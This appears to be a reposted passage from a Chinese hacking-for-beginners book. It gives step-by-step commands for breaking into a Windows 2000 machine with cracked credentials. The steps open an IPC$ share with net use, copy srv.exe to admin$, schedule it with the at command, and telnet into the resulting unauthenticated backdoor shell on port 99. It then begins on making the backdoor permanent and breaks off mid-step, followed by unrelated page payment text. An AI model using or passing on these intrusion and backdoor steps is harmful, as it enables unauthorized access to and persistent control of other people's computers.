[黑客入门全程图解].吴自容,武新华.等编著.文字版,精确还原

下面我们以192.168.11.251 这个IP 地址为例进行讲解,得到密码后,是如何获取对方的资源并留下后门的。
打开W i n d o w s 2 0 0 0 自带的命令提示行(在运行框里输入“c m d ”命令),进入命令窗口,运行:
① C:\〉net use \\192.168.11.251\IPC$ 密码 /user:用户名
其中,用户名是用流光扫描到的用户,密码为该用户的密码。用此命令可以与1 9 2 . 1 6 8 . 1 1 . 2 5 1 建立一个连
接,运行后显示“命令成功完成”。这样通过I P C $ 的远程登录就成功了。
② C:\〉copy srv.exe \\192.168.11.251\admin$
登陆成功之后先复制一个T e l n e t 的程序上去,(小榕流光安装目录下的T o o l s 目录里的S r v . e x e ),这个程
序是在目标主机上面开一个Telnet 服务,端口为9 9(或者用其他后门软件开一个端口以供登录)。这里的admin$
指的是c:\winnt\system32 目录,还可以使用c $、d $,即C 盘与D 盘,这要看你复制到什么地方,以后可以利
用定时服务启动它。
③ C:\〉net time \\192.168.11.251
在启动定时服务之前,需要先了解对方的时间。用此命令可以检查目标计算机的时间。假设192.168.11.251
的当前时间是2002/7/19 上午11:00 ,命令成功完成。
④ C:\〉at \\192.168.11.251 11:05 srv.exe
检查到目标计算机的时间后,就可以用a t 命令启动s r v . e x e 了,这里设置的时间要在目标计算机时间后,
否则启动不了。显示:新加了一项作业,其作业 ID = 0。
⑤ C:\〉net time \\192.168.11.251
再查查到时间没有,如果192.168.11.251 的当前时间是2002/7/19 上午11:05,那就准备开始下面的命令。
⑥ C:\〉telnet 192.168.11.251 99
这里用Telnet 命令登录上去,注意端口是99。Telnet 默认的是23 端口,但是我们使用 srv.exe 在对方计
算机中为我们建立一个99 端口的Shell。这里不需要验证身份,直接登录,如果显示:c:\winnt\system32〉,表
明成功登录上去了。
虽然我们T e l n e t 上去了,但是s r v . e x e 是一次性的,下次登录还要再激活!所以需要建立一个T e l n e t 服
务!这就要用到n t l m (在小榕流光安装目录下的T o o l s 目录里也可以找到)。然后在本地打开命令提示符,另外
打开一个窗口,输入:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值